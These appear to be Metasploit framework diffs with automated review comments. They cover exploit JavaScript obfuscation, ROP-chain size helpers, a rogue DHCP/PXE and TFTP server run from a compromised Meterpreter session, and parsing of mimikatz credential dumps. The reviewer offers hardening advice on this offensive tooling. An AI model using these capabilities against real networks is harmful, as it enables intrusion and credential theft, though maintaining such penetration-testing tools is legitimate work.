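Review bot: Typo in the class comment: `# Provides meomry manipulative functions in JavaScript` should read `# Provides memory-manipulation helpers (sprays and allocations) in JavaScript`. `mstime_malloc` substitutes fresh random hex for the `W00TA`/`W00TB` placeholders but never exposes the chosen values, so if an exploit needs to reference those names from its own JavaScript it cannot; returning them alongside the script, or accepting them as parameters, is worth considering (whether callers need them is not visible here). Each helper re-reads its template from disk on every call, which is fine for exploit generation but deserves a note if these ever land on a hot path.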


@ -0,0 +1,28 @@
# -*- coding: binary -*-
require 'msf/core'
module Rex
module Exploitation
module Js
#
# Provides networking functions in JavaScript
#
class Network
def self.ajax_download
js = ::File.read(::File.join(Msf::Config.data_directory, "js", "network", "ajax_download.js"))
::Rex::Exploitation::ObfuscateJS.new(js,
{
'Symbols' => {
'Variables' => %w{ xmlHttp }
}
}).obfuscate
end
end
end
end
end


@ -0,0 +1,33 @@
# -*- coding: binary -*-
require 'msf/core'
require 'rex/text'
require 'rex/exploitation/jsobfu'
module Rex
module Exploitation
module Js
#
# Javascript utilities
#
class Utils
def self.base64
js = ::File.read(::File.join(Msf::Config.data_directory, "js", "utils", "base64.js"))
opts = {
'Symbols' => {
'Variables' => %w{ Base64 encoding result _keyStr encoded_data utftext input_idx
input output chr chr1 chr2 chr3 enc1 enc2 enc3 enc4 },
'Methods' => %w{ _utf8_encode _utf8_decode encode decode }
}
}
::Rex::Exploitation::ObfuscateJS.new(js, opts).to_s
end
end
end
end
end
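Review bot: `Utils.base64` builds an `ObfuscateJS` with variable and method symbol lists but then calls `.to_s` without ever calling `.obfuscate`, so unless `to_s` obfuscates implicitly (not visible here) it returns the template unchanged and the symbol lists are dead configuration; the sibling `Memory` and `Network` helpers call `.obfuscate`. Either call `::Rex::Exploitation::ObfuscateJS.new(js, opts).obfuscate` like the others, or drop `opts` and document that the helper is intentionally left readable. A one-line comment on the method stating what it returns (a string here, versus the `JSObfu` instances returned by `Js::Detect`) would make the difference explicit for callers.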


@ -29,7 +29,7 @@ class RopDb
#
# Returns an array of ROP gadgets. Each gadget can either be an offset, or a value (symbol or
# some integer). When the value is a symbol, it can be one of these: :nop, :junk, :size,
# and :size_negate.
# :unsafe_negate_size, and :safe_negate_size
# Note if no RoP is found, it returns an empry array.
# Arguments:
# rop_name - name of the ROP chain.
@ -90,8 +90,10 @@ class RopDb
Rex::Text.rand_text(4, badchars).unpack("V")[0].to_i
elsif e == :size
payload.length
elsif e == :size_negate
0xffffffff - payload.length + 1
elsif e == :unsafe_negate_size
get_unsafe_size(payload.length)
elsif e == :safe_negate_size
get_safe_size(payload.length)
else
e
end
@ -105,6 +107,28 @@ class RopDb
private
#
# Returns a size that's safe from null bytes.
# This function will keep incrementing the value of "s" until it's safe from null bytes.
#
def get_safe_size(s)
safe_size = get_unsafe_size(s)
while (safe_size.to_s(16).rjust(8, '0')).scan(/../).include?("00")
safe_size -= 1
end
safe_size
end
#
# Returns a size that might contain one or more null bytes
#
def get_unsafe_size(s)
0xffffffff - s + 1
end
#
# Checks if a ROP chain is compatible
#
@ -146,8 +170,10 @@ class RopDb
gadgets << :junk
when 'size'
gadgets << :size
when 'size_negate'
gadgets << :size_negate
when 'unsafe_negate_size'
gadgets << :unsafe_negate_size
when 'safe_negate_size'
gadgets << :safe_negate_size
else
gadgets << value.to_i(16)
end
@ -160,4 +186,4 @@ class RopDb
end
end
end
end
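Review bot: The comment on `get_safe_size` says it keeps incrementing `s`, but the loop decrements `safe_size`; the two agree only once the reader works out that decrementing the two's-complement negation grows the effective size, so say so: `# Decrements the negated value (i.e. grows the effective size) until no byte of its 32-bit form is 0x00`. The docs for `:safe_negate_size` should also state that the resulting size is larger than the payload, so the chain must tolerate over-allocation, and that only null bytes are avoided — the `badchars` honoured for `:junk` are not consulted here. `get_unsafe_size(0)` yields 0x100000000, which does not fit a 32-bit gadget slot; if the caller packs with `'V'` (not visible here) it silently becomes 0, so masking with `& 0xffffffff` or rejecting an empty payload outright would be safer.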


@ -0,0 +1,239 @@
require "rex/parser/nokogiri_doc_mixin"
module Rex
module Parser
load_nokogiri && class Outpost24Document < Nokogiri::XML::SAX::Document
include NokogiriDocMixin
def start_element(name, attrs)
@state[:current_tag][name] = true
case name
when "description", "information"
return unless in_tag("detaillist")
return unless in_tag("detail")
record_text
when "detail"
return unless in_tag("detaillist")
record_vuln
when "detaillist"
record_vulns
when "host"
return unless in_tag("hostlist")
record_host
when "hostlist"
record_hosts
when "id"
return unless in_tag("detaillist")
return unless in_tag("detail")
return unless in_tag("cve")
record_text
when "name"
return unless in_tag("hostlist") || in_tag("detaillist")
return unless in_tag("host") || in_tag("detail")
record_text
when "platform"
return unless in_tag("hostlist")
return unless in_tag("host")
record_text
when "portinfo"
return unless in_tag("portlist")
return unless in_tag("portlist-host")
record_service
when "portlist"
record_services
when "portnumber", "protocol", "service"
return unless in_tag("portlist")
return unless in_tag("portlist-host")
return unless in_tag("portinfo")
record_text
when "report", "ip"
record_text
end
end
def end_element(name)
case name
when "description", "information"
return unless in_tag("detaillist")
return unless in_tag("detail")
collect_vuln_data(name)
when "detail"
return unless in_tag("detaillist")
collect_vuln
when "detaillist"
report_vulns
when "host"
return unless in_tag("hostlist")
collect_host
when "hostlist"
report_hosts
when "id"
return unless in_tag("detaillist")
return unless in_tag("detail")
return unless in_tag("cve")
collect_vuln_data(name)
when "ip"
collect_ip
when "name"
if in_tag("hostlist") && in_tag("host")
collect_host_data(name)
elsif in_tag("detaillist") && in_tag("detail")
collect_vuln_data(name)
end
when "platform"
return unless in_tag("hostlist")
return unless in_tag("host")
collect_host_data(name)
when "portinfo"
return unless in_tag("portlist")
return unless in_tag("portlist-host")
collect_service
when "portlist"
report_services
when "portnumber", "protocol", "service"
return unless in_tag("portlist")
return unless in_tag("portlist-host")
return unless in_tag("portinfo")
collect_service_data(name)
when "report"
collect_product
end
@state[:current_tag].delete(name)
end
def record_hosts
@report_data[:hosts] = []
end
def record_services
@report_data[:services] = []
end
def record_vulns
@report_data[:vulns] = []
end
def record_host
@host = {}
end
def record_service
@service = {}
end
def record_vuln
@vuln = {}
@refs = []
end
def record_text
@state[:has_text] = true
end
def collect_host
@host[:host] = @state[:host]
@host[:name] = @state[:hname]
@host[:os_name] = @state[:os_name]
@host[:info] = @state[:pinfo]
@report_data[:hosts] << @host
end
def collect_service
@service[:host] = @state[:host]
@service[:port] = @state[:port]
@service[:proto] = @state[:proto]
@service[:name] = @state[:sname]
@service[:info] = @state[:pinfo]
@report_data[:services] << @service
end
def collect_vuln
@vuln[:host] = @state[:host]
@vuln[:name] = @state[:vname]
@vuln[:info] = @state[:vinfo]
@vuln[:refs] = @refs
@report_data[:vulns] << @vuln
end
def collect_product
@state[:has_text] = false
@state[:pinfo] = @text.strip if @text
@text = nil
end
def collect_ip
@state[:has_text] = false
@state[:host] = @text.strip if @text
@text = nil
end
def collect_host_data(name)
@state[:has_text] = false
if name == "name"
@state[:hname] = @text.strip if @text
elsif name == "platform"
if @text
@state[:os_name] = @text.strip
else
@state[:os_name] = Msf::OperatingSystems::UNKNOWN
end
end
@text = nil
end
def collect_service_data(name)
@state[:has_text] = false
if name == "portnumber"
@state[:port] = @text.strip if @text
elsif name == "protocol"
@state[:proto] = @text.strip.downcase if @text
elsif name == "service"
@state[:sname] = @text.strip if @text
end
@text = nil
end
def collect_vuln_data(name)
@state[:has_text] = false
if name == "name"
@state[:vname] = @text.strip if @text
elsif name == "description"
@state[:vinfo] = @text.strip if @text
elsif name == "information"
@state[:vinfo] << " #{@text.strip if @text}"
elsif name == "id"
@state[:ref] = @text.strip if @text
@refs << normalize_ref("CVE", @state[:ref])
end
@text = nil
end
def report_hosts
block = @block
@report_data[:hosts].each do |h|
db.emit(:address, h[:host], &block) if block
db_report(:host, h)
end
end
def report_services
block = @block
@report_data[:services].each do |s|
db.emit(:service, "#{s[:host]}:#{s[:port]}/#{s[:proto]}", &block) if block
db_report(:service, s)
end
end
def report_vulns
block = @block
@report_data[:vulns].each do |v|
db.emit(:vuln, ["#{v[:name]} (#{v[:host]})", 1], &block) if block
db_report(:vuln, v)
end
end
end
end
end
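Review bot: `collect_vuln_data` raises when a detail element carries an `information` child but no preceding `description`: `@state[:vinfo]` is never initialised in `record_vuln`, so `@state[:vinfo] << ...` on line 2633 is a NoMethodError on nil, and the interpolation `"#{@text.strip if @text}"` appends a bare space when there is no text — use `(@state[:vinfo] ||= "") << " #{@text.strip}" if @text`. In the `id` branch the reference is pushed even when `@text` is nil, in which case `@state[:ref]` still holds the previous detail's CVE and is duplicated onto this vuln; push only when text is present, `@refs << normalize_ref("CVE", @text.strip) if @text`. More generally `record_vuln` resets `@vuln`/`@refs` but not `@state[:vname]`/`[:vinfo]`, and `record_host`/`record_service` likewise leave `:hname`/`:os_name`/`:port`/`:proto`/`:sname` in place, so an element missing a field inherits the previous one's value; clearing those keys in the `record_*` methods keeps data imported from an untrusted report honest.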


@ -0,0 +1,78 @@
# -*- coding: binary -*-
require 'rex/post/meterpreter/extensions/lanattacks/tlv'
module Rex
module Post
module Meterpreter
module Extensions
module Lanattacks
module Dhcp
###
#
# DHCP Server functionality
#
###
class Dhcp
def initialize(client)
@client = client
end
def start
client.send_request(Packet.create_request('lanattacks_start_dhcp'))
true
end
def reset
client.send_request(Packet.create_request('lanattacks_reset_dhcp'))
true
end
def set_option(name, value)
request = Packet.create_request('lanattacks_set_dhcp_option')
request.add_tlv(TLV_TYPE_LANATTACKS_OPTION_NAME, name)
request.add_tlv(TLV_TYPE_LANATTACKS_OPTION, value)
client.send_request(request)
true
end
def load_options(datastore)
# TODO: change this so that all of the options are set in a single
# payload rather than firing off lots of calls separately
datastore.each do |name, value|
if Regexp.new('DHCPIPSTART|DHCPIPEND|NETMASK|ROUTER|DNSSERVER|BROADCAST|'+
'SERVEONCE|PXE|HOSTNAME|HOSTSTART|FILENAME|PXECONF|SRVHOST') =~ name
set_option(name, value)
end
end
end
def stop
client.send_request(Packet.create_request('lanattacks_stop_dhcp'))
true
end
def log
response = client.send_request(Packet.create_request('lanattacks_dhcp_log'))
entries = []
if( response.result == 0 )
log = response.get_tlv_value( TLV_TYPE_LANATTACKS_RAW )
while log.length > 0
mac = log.slice!(0..5)
ip = log.slice!(0..3)
entries << {
:mac => mac,
:ip => ip
}
end
end
entries
end
attr_accessor :client
end
end; end; end; end; end; end
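Review bot: `load_options` matches datastore keys against an unanchored alternation, so any key merely containing one of the names (a module option called `MYROUTER` or `PXEFILENAME`, say) is forwarded to the server as a DHCP option; anchor it and hoist it to a constant, `DHCP_OPTIONS = /\A(?:DHCPIPSTART|DHCPIPEND|NETMASK|ROUTER|DNSSERVER|BROADCAST|SERVEONCE|PXE|HOSTNAME|HOSTSTART|FILENAME|PXECONF|SRVHOST)\z/`, and use `set_option(name, value) if DHCP_OPTIONS =~ name`. In `log`, `:mac` and `:ip` are the raw 6- and 4-byte strings sliced from the TLV; either document that callers must format them or convert here (`mac.unpack('C*').map { |b| '%02x' % b }.join(':')` and `Rex::Socket.addr_ntoa(ip)`), since the console dispatcher added in this commit prints them as-is. The loop also emits a short bogus entry when the blob length is not a multiple of 10; `while log.length >= 10` would drop the truncated tail instead.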


@ -2,6 +2,8 @@
# -*- coding: binary -*-
require 'rex/post/meterpreter/extensions/lanattacks/tlv'
require 'rex/post/meterpreter/extensions/lanattacks/dhcp/dhcp'
require 'rex/post/meterpreter/extensions/lanattacks/tftp/tftp'
module Rex
module Post
@ -16,84 +18,27 @@ module Lanattacks
###
class Lanattacks < Extension
#
# Initializes an instance of the lanattacks extension.
#
def initialize(client)
super(client, 'lanattacks')
# Alias the following things on the client object so that they
# can be directly referenced
client.register_extension_aliases(
[{
[
{
'name' => 'lanattacks',
'ext' => self
},])
'ext' => ObjectAliases.new(
{
'dhcp' => Rex::Post::Meterpreter::Extensions::Lanattacks::Dhcp::Dhcp.new(client),
'tftp' => Rex::Post::Meterpreter::Extensions::Lanattacks::Tftp::Tftp.new(client)
}),
}
])
end
def start_dhcp
client.send_request(Packet.create_request('lanattacks_start_dhcp'))
true
end
def reset_dhcp
client.send_request(Packet.create_request('lanattacks_reset_dhcp'))
true
end
def set_dhcp_option(name, value)
request = Packet.create_request('lanattacks_set_dhcp_option')
request.add_tlv(TLV_TYPE_LANATTACKS_OPTION_NAME, name)
request.add_tlv(TLV_TYPE_LANATTACKS_OPTION, value)
client.send_request(request)
true
end
def load_dhcp_options(datastore)
datastore.each do |name, value|
if Regexp.new('DHCPIPSTART|DHCPIPEND|NETMASK|ROUTER|DNSSERVER|BROADCAST|'+
'SERVEONCE|PXE|HOSTNAME|HOSTSTART|FILENAME|PXECONF|SRVHOST') =~ name
set_dhcp_option(name,value)
end
end
end
def stop_dhcp
client.send_request(Packet.create_request('lanattacks_stop_dhcp'))
true
end
def dhcp_log
response = client.send_request(Packet.create_request('lanattacks_dhcp_log'))
entries = []
if( response.result == 0 )
log = response.get_tlv_value( TLV_TYPE_LANATTACKS_RAW )
while log.length > 0
mac = log.slice!(0..5)
ip = log.slice!(0..3)
entries << [ mac, ip ]
end
end
entries
end
def start_tftp
client.send_request(Packet.create_request('lanattacks_start_tftp'))
true
end
def reset_tftp
client.send_request(Packet.create_request('lanattacks_reset_tftp'))
true
end
def add_tftp_file(filename, data)
request = Packet.create_request('lanattacks_add_tftp_file')
request.add_tlv(TLV_TYPE_LANATTACKS_OPTION_NAME, filename)
request.add_tlv(TLV_TYPE_LANATTACKS_RAW, data, false, true) #compress it
client.send_request(request)
true
end
def stop_tftp
client.send_request(Packet.create_request('lanattacks_stop_tftp'))
true
end
end
end; end; end; end; end
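Review bot: The public methods `start_dhcp`, `set_dhcp_option`, `load_dhcp_options`, `dhcp_log`, `start_tftp`, `add_tftp_file` and the rest are removed outright, `dhcp_log` entries change shape from `[mac, ip]` arrays to `{:mac, :ip}` hashes, and `client.lanattacks` now resolves to the `ObjectAliases` rather than this extension instance — so any post module or script that called `client.lanattacks.start_dhcp` or indexed `entry[0]` breaks unless it is updated in the same commit, which is not visible here. Because the extension object is no longer what the alias returns, compatibility shims cannot live on this class; if the old names matter, add them to the aliases hash delegating to the new sub-objects, otherwise document the break. Either way a class comment naming `client.lanattacks.dhcp` and `client.lanattacks.tftp` as the supported surface would help.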


@ -0,0 +1,49 @@
# -*- coding: binary -*-
require 'rex/post/meterpreter/extensions/lanattacks/tlv'
module Rex
module Post
module Meterpreter
module Extensions
module Lanattacks
module Tftp
###
#
# TFTP Server functionality
#
###
class Tftp
def initialize(client)
@client = client
end
def start
client.send_request(Packet.create_request('lanattacks_start_tftp'))
true
end
def reset
client.send_request(Packet.create_request('lanattacks_reset_tftp'))
true
end
def add_file(filename, data)
request = Packet.create_request('lanattacks_add_tftp_file')
request.add_tlv(TLV_TYPE_LANATTACKS_OPTION_NAME, filename)
request.add_tlv(TLV_TYPE_LANATTACKS_RAW, data, false, true) #compress it
client.send_request(request)
true
end
def stop
client.send_request(Packet.create_request('lanattacks_stop_tftp'))
true
end
attr_accessor :client
end
end; end; end; end; end; end
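Review bot: `start`, `reset`, `add_file` and `stop` discard the response and return `true` unconditionally, so a caller cannot tell a server that failed to bind (port 69 in use, insufficient privilege) from one that started; the sibling `Dhcp#log` does inspect `response.result`, so the two classes disagree on whether the result needs checking. If `client.send_request` raises on a non-zero result (I believe Meterpreter's dispatcher does, but it is not visible here) say so in a class comment; otherwise return `client.send_request(request).result == 0`. The `false, true` positional flags on `add_tlv` deserve a comment naming both flags rather than `#compress it` alone.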


@ -5,10 +5,10 @@ module Meterpreter
module Extensions
module Lanattacks
TLV_TYPE_LANATTACKS_OPTION = TLV_META_TYPE_RAW| (TLV_EXTENSIONS + 1)
TLV_TYPE_LANATTACKS_OPTION_NAME = TLV_META_TYPE_STRING| (TLV_EXTENSIONS + 2)
TLV_TYPE_LANATTACKS_UINT = TLV_META_TYPE_UINT| (TLV_EXTENSIONS + 3)
TLV_TYPE_LANATTACKS_RAW = TLV_META_TYPE_RAW| (TLV_EXTENSIONS + 4)
TLV_TYPE_LANATTACKS_OPTION = TLV_META_TYPE_RAW | (TLV_EXTENSIONS + 1)
TLV_TYPE_LANATTACKS_OPTION_NAME = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 2)
TLV_TYPE_LANATTACKS_UINT = TLV_META_TYPE_UINT | (TLV_EXTENSIONS + 3)
TLV_TYPE_LANATTACKS_RAW = TLV_META_TYPE_RAW | (TLV_EXTENSIONS + 4)
end
end


@ -34,14 +34,18 @@ class Mimikatz < Extension
])
end
def send_custom_command(function, args=[])
def send_custom_command_raw(function, args=[])
request = Packet.create_request('mimikatz_custom_command')
request.add_tlv(TLV_TYPE_MIMIKATZ_FUNCTION, function)
args.each do |a|
request.add_tlv(TLV_TYPE_MIMIKATZ_ARGUMENT, a)
end
response = client.send_request(request)
return Rex::Text.to_ascii(response.get_tlv_value(TLV_TYPE_MIMIKATZ_RESULT))
return response.get_tlv_value(TLV_TYPE_MIMIKATZ_RESULT)
end
def send_custom_command(function, args=[])
return Rex::Text.to_ascii(send_custom_command_raw(function, args))
end
def parse_creds_result(result)
@ -63,11 +67,18 @@ class Mimikatz < Extension
def parse_ssp_result(result)
details = CSV.parse(result)
accounts = []
return accounts unless details
details.each do |acc|
next unless acc.length == 5
ssps = acc[4].split(' }')
next unless ssps
ssps.each do |ssp|
next unless ssp
s_acc = ssp.split(' ; ')
next unless s_acc
user = s_acc[0].split('{ ')[1]
next unless user
account = {
:authid => acc[0],
:package => acc[1],
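Review bot: The nil guards added to `parse_ssp_result` mostly cannot fire — `CSV.parse` returns an array, never nil, and `String#split` never returns nil — while the case that does crash is unguarded: a leading empty piece from `acc[4].split(' }')` (input beginning with ` }`) gives `s_acc = []`, so `s_acc[0].split('{ ')` on line 2922 raises NoMethodError. Replace `next unless s_acc` with `next if s_acc.empty?` and drop the dead `next unless ssps` and `return accounts unless details`. `CSV.parse` also raises `CSV::MalformedCSVError` on an unbalanced quote in the raw mimikatz output, which is text originating on the compromised host; rescuing that around the parse and returning `accounts` with a logged error keeps one odd credential line from aborting the whole dump. The method continues past the end of the hunk.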


@ -231,6 +231,24 @@ class Config
return true
end
#
# Get's the current proxy configuration
#
def get_proxy_config()
request = Packet.create_request('stdapi_net_config_get_proxy')
response = client.send_request(request)
proxy_config = {
:autodetect => response.get_tlv_value(TLV_TYPE_PROXY_CFG_AUTODETECT),
:autoconfigurl => response.get_tlv_value(TLV_TYPE_PROXY_CFG_AUTOCONFIGURL),
:proxy => response.get_tlv_value(TLV_TYPE_PROXY_CFG_PROXY),
:proxybypass => response.get_tlv_value(TLV_TYPE_PROXY_CFG_PROXYBYPASS)
}
return proxy_config
end
protected
attr_accessor :client # :nodoc:
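Review bot: The doc comment on `get_proxy_config` has an apostrophe typo and says nothing about the result; suggest `# Gets the proxy configuration reported by the session host as a hash with :autodetect (bool) and :autoconfigurl, :proxy, :proxybypass (strings); a value is nil when the server omits that TLV.` The `:proxy` string may embed credentials in `user:pass@host` form depending on how the host is configured (not visible here), so callers that log it should treat it as sensitive — worth one more line in the comment. Style: `def get_proxy_config` without the empty parens and an implicit return of the hash match the rest of the class.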


@ -48,7 +48,7 @@ class Resolve
def resolve_hosts(hostnames, family=AF_INET)
request = Packet.create_request('stdapi_net_resolve_hosts')
request.add_tlv(TLV_TYPE_ADDR_TYPE, family)
hostnames.each do |hostname|
request.add_tlv(TLV_TYPE_HOST_NAME, hostname)
end
@ -84,7 +84,7 @@ class Resolve
end
if raw.empty?
ip = ""
ip = nil
else
if type == AF_INET
ip = Rex::Socket.addr_ntoa(raw[0..3])
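Review bot: Changing `ip = ""` to `ip = nil` for an unresolved host is a silent contract change: any caller outside this hunk that tested `ip.empty?` or interpolated the value now gets a NoMethodError or a bare `nil` in a string. Worth a one-line comment where `ip` is initialised, `# nil (not "") when the host did not resolve; callers must check for nil`, and a scan of existing `resolve_hosts`/`resolve_host` call sites, which I cannot see here. The enclosing method starts and ends outside the hunk.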


@ -42,10 +42,13 @@ class MultiCaller
include DLLHelper
def initialize( client, parent )
def initialize( client, parent, win_consts )
@parent = parent
@client = client
# needed by DLL helper
@win_consts = win_consts
if( @client.platform =~ /x64/i )
@native = 'Q'
else
@ -224,9 +227,17 @@ class MultiCaller
rec_out_only_buffers = response.get_tlv_value(TLV_TYPE_RAILGUN_BACK_BUFFERBLOB_OUT)
rec_return_value = response.get_tlv_value(TLV_TYPE_RAILGUN_BACK_RET)
rec_last_error = response.get_tlv_value(TLV_TYPE_RAILGUN_BACK_ERR)
rec_err_msg = response.get_tlv_value(TLV_TYPE_RAILGUN_BACK_MSG)
# Error messages come back with trailing CRLF, so strip it out
# if we do get a message.
rec_err_msg.strip! if not rec_err_msg.nil?
# The hash the function returns
return_hash={"GetLastError" => rec_last_error}
return_hash = {
"GetLastError" => rec_last_error,
"ErrorMessage" => rec_err_msg
}
#process return value
case function.return_type
@ -303,8 +314,6 @@ class MultiCaller
protected
attr_accessor :win_consts
end # MultiCall
end; end; end; end; end; end
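Review bot: `rec_err_msg.strip! if not rec_err_msg.nil?` is un-idiomatic (`if not`) and mutates the TLV value in place; `rec_err_msg = rec_err_msg.strip unless rec_err_msg.nil?` reads better and leaves the response object untouched. A comment on the return hash that `"ErrorMessage"` is nil for payloads that do not send `TLV_TYPE_RAILGUN_BACK_MSG` would spare callers an assumption. The new required `win_consts` parameter also breaks any out-of-tree caller of `MultiCaller.new(client, parent)`; the in-tree caller is updated in this commit, but if this class is public API a default of `win_consts = nil` with a clear error when `DLLHelper` actually needs it would be kinder. The `call` method continues outside the hunk.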


@ -290,7 +290,7 @@ class Railgun
#
def multi(functions)
if @multicaller.nil?
@multicaller = MultiCaller.new(client, self)
@multicaller = MultiCaller.new(client, self, ApiConstants.manager)
end
return @multicaller.call(functions)


@ -69,6 +69,12 @@ TLV_TYPE_ROUTE_METRIC = TLV_META_TYPE_UINT | 1443
# Resolve
TLV_TYPE_ADDR_TYPE = TLV_META_TYPE_UINT | 1444
# Proxy configuration
TLV_TYPE_PROXY_CFG_AUTODETECT = TLV_META_TYPE_BOOL | 1445
TLV_TYPE_PROXY_CFG_AUTOCONFIGURL = TLV_META_TYPE_STRING | 1446
TLV_TYPE_PROXY_CFG_PROXY = TLV_META_TYPE_STRING | 1447
TLV_TYPE_PROXY_CFG_PROXYBYPASS = TLV_META_TYPE_STRING | 1448
# Socket
TLV_TYPE_PEER_HOST = TLV_META_TYPE_STRING | 1500
TLV_TYPE_PEER_PORT = TLV_META_TYPE_UINT | 1501


@ -0,0 +1,60 @@
# -*- coding: binary -*-
require 'rex/post/meterpreter'
module Rex
module Post
module Meterpreter
module Ui
###
#
# Lanattacks extension.
#
###
class Console::CommandDispatcher::Lanattacks
require 'rex/post/meterpreter/ui/console/command_dispatcher/lanattacks/dhcp'
require 'rex/post/meterpreter/ui/console/command_dispatcher/lanattacks/tftp'
Klass = Console::CommandDispatcher::Lanattacks
Dispatchers =
[
Klass::Dhcp,
Klass::Tftp
]
include Console::CommandDispatcher
#
# Initializes an instance of the lanattacks command interaction.
#
def initialize(shell)
super
Dispatchers.each { |d|
shell.enstack_dispatcher(d)
}
end
#
# List of supported commands.
#
def commands
{
}
end
#
# Name for this dispatcher
#
def name
"Lanattacks extension"
end
end
end
end
end
end


@ -0,0 +1,254 @@
# -*- coding: binary -*-
require 'rex/post/meterpreter'
module Rex
module Post
module Meterpreter
module Ui
###
#
# The DHCP portion of the lanattacks extension.
#
###
class Console::CommandDispatcher::Lanattacks::Dhcp
Klass = Console::CommandDispatcher::Lanattacks::Dhcp
include Console::CommandDispatcher
#
# List of supported commands.
#
def commands
all = {
"dhcp_start" => "Start the DHCP server",
"dhcp_stop" => "Stop the DHCP server",
"dhcp_reset" => "Reset the DHCP server",
"dhcp_set_option" => "Set a DHCP server option",
"dhcp_load_options" => "Load DHCP optionis from a datastore",
"dhcp_log" => "Log DHCP server activity"
}
reqs = {
"dhcp_start" => [ "lanattacks_start_dhcp" ],
"dhcp_stop" => [ "lanattacks_stop_dhcp" ],
"dhcp_reset" => [ "lanattacks_reset_dhcp" ],
"dhcp_set_option" => [ "lanattacks_set_dhcp_option" ],
"dhcp_load_options" => [ "lanattacks_set_dhcp_option" ],
"dhcp_log" => [ "lanattacks_dhcp_log" ]
}
all.delete_if do |cmd, desc|
del = false
reqs[cmd].each do |req|
next if client.commands.include? req
del = true
break
end
del
end
all
end
#
# Name for this dispatcher.
#
def name
"Lanattacks: DHCP"
end
@@dhcp_start_opts = Rex::Parser::Arguments.new(
"-h" => [ false, "Help banner." ])
def print_dhcp_start_usage
print("dhcp_start [-h]\n\n" +
"Starts a DHCP server in the current Meterpreter session.\n" +
@@dhcp_start_opts.usage + "\n")
end
def cmd_dhcp_start(*args)
@@dhcp_start_opts.parse(args) { |opt, idx, val|
case opt
when '-h'
print_dhcp_start_usage
return true
end
}
print_status( "Starting DHCP server ...")
client.lanattacks.dhcp.start
print_good( "DHCP server startd.")
end
@@dhcp_stop_opts = Rex::Parser::Arguments.new(
"-h" => [ false, "Help banner." ])
def print_dhcp_stop_usage
print("dhcp_stop [-h]\n\n" +
"Stops the currently running DHCP server.\n" +
@@dhcp_stop_opts.usage + "\n")
end
def cmd_dhcp_stop(*args)
@@dhcp_stop_opts.parse(args) { |opt, idx, val|
case opt
when '-h'
print_dhcp_stop_usage
return true
end
}
print_status( "Stopping DHCP server ...")
client.lanattacks.dhcp.stop
print_good( "DHCP server stopped.")
end
@@dhcp_reset_opts = Rex::Parser::Arguments.new(
"-h" => [ false, "Help banner." ])
def print_dhcp_reset_usage
print("dhcp_reset [-h]\n\n" +
"Resets the currently running DHCP server.\n" +
@@dhcp_reset_opts.usage + "\n")
end
def cmd_dhcp_reset(*args)
@@dhcp_reset_opts.parse(args) { |opt, idx, val|
case opt
when '-h'
print_dhcp_reset_usage
return true
end
}
print_status( "Resetting DHCP server ...")
client.lanattacks.dhcp.reset
print_good( "DHCP server reset.")
end
@@dhcp_set_option_opts = Rex::Parser::Arguments.new(
"-h" => [ false, "Help banner." ])
@@dhcp_set_option_valid_options = [
"BROADCAST", "DHCPIPEND", "DHCPIPSTART", "DNSSERVER",
"FILENAME", "HOSTNAME", "HOSTSTART", "NETMASK",
"PXE", "PXECONF", "ROUTER", "SERVEONCE", "SRVHOST"
]
def print_dhcp_set_option_usage
print("dhcp_set_option <name> <value> [-h]\n\n" +
"Set a DHCP server option.\n\n" +
"Valid names are:\n" +
@@dhcp_set_option_valid_options.map {|o| " - #{o}\n" }.join('') +
@@dhcp_set_option_opts.usage + "\n")
end
def cmd_dhcp_set_option(*args)
@@dhcp_set_option_opts.parse(args) { |opt, idx, val|
case opt
when '-h'
print_dhcp_set_option_usage
return true
end
}
if args.length < 2
print_dhcp_set_option_usage
return true
end
name = args.shift.upcase
value = args.shift
if not @@dhcp_set_option_valid_options.include? name
print_error( "Invalid option name '#{name}'." )
return true
end
client.lanattacks.dhcp.set_option(name, value)
end
@@dhcp_load_options_opts = Rex::Parser::Arguments.new(
"-h" => [ false, "Help banner." ])
def print_dhcp_load_options_usage
print("dhcp_load_options <datastore> [-h]\n\n" +
"Load settings from a datstore to the active DHCP server.\n\n" +
"The datastore must be a hash of name/value pairs.\n" +
"Valid names are:\n" +
@@dhcp_set_option_valid_options.map {|o| " - #{o}\n" }.join('') +
@@dhcp_set_option_opts.usage + "\n")
end
def cmd_dhcp_load_options(*args)
@@dhcp_set_option_opts.parse(args) { |opt, idx, val|
case opt
when '-h'
print_dhcp_set_option_usage
return true
end
}
if args.length < 1
print_dhcp_load_options_usage
return true
end
datastore = args.shift
if not datastore.is_a?(Hash)
print_dhcp_load_options_usage
return true
end
client.lanattacks.dhcp.load_options(datastore)
end
@@dhcp_log_opts = Rex::Parser::Arguments.new(
"-h" => [ false, "Help banner." ])
def print_dhcp_log_usage
print("dhcp_log [-h]\n\n" +
"Logs the DHCP operations captured by the DHCP server.\n" +
@@dhcp_log_opts.usage + "\n")
end
def cmd_dhcp_log(*args)
@@dhcp_log_opts.parse(args) { |opt, idx, val|
case opt
when '-h'
print_dhcp_log_usage
return true
end
}
log = client.lanattacks.dhcp.log
table = Rex::Ui::Text::Table.new(
'Header' => 'DHCP Server Log',
'Indent' => 0,
'SortIndex' => 0,
'Columns' => [ 'MAC Address', 'IP Address' ]
)
log.each { |l|
table << [ l[:mac], l[:ip] ]
}
print_line
print_line( table.to_s )
print_line( "Total log entries: #{log.length}" )
print_line
end
end
end
end
end
end


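--- /dev/null
+++ b/[path not shown on page]
@@ -0,0 +1,159 @@
+# -*- coding: binary -*-
+require 'rex/post/meterpreter'
+module Rex
+module Post
+module Meterpreter
+module Ui
+###
+#
+# The TFTP portion of the lanattacks extension.
+#
+###
+class Console::CommandDispatcher::Lanattacks::Tftp
+Klass = Console::CommandDispatcher::Lanattacks::Tftp
+include Console::CommandDispatcher
+#
+# List of supported commands.
+#
+def commands
+all = {
+"tftp_start" => "Start the TFTP server",
+"tftp_stop" => "Stop the TFTP server",
+"tftp_reset" => "Reset the TFTP server",
+"tftp_add_file" => "Add a file to the TFTP server"
+}
+reqs = {
+"tftp_start" => [ "lanattacks_start_tftp" ],
+"tftp_stop" => [ "lanattacks_stop_tftp" ],
+"tftp_reset" => [ "lanattacks_reset_tftp" ],
+"tftp_add_file" => [ "lanattacks_add_tftp_file" ],
+}
+all.delete_if do |cmd, desc|
+del = false
+reqs[cmd].each do |req|
+next if client.commands.include? req
+del = true
+break
+end
+del
+end
+all
+end
+#
+# Name for this dispatcher.
+#
+def name
+"Lanattacks: TFTP"
+end
+@@tftp_start_opts = Rex::Parser::Arguments.new(
+"-h" => [ false, "Help banner." ])
+def print_tftp_start_usage
+print("tftp_start [-h]\n\n" +
+"Starts a TFTP server in the current Meterpreter session.\n" +
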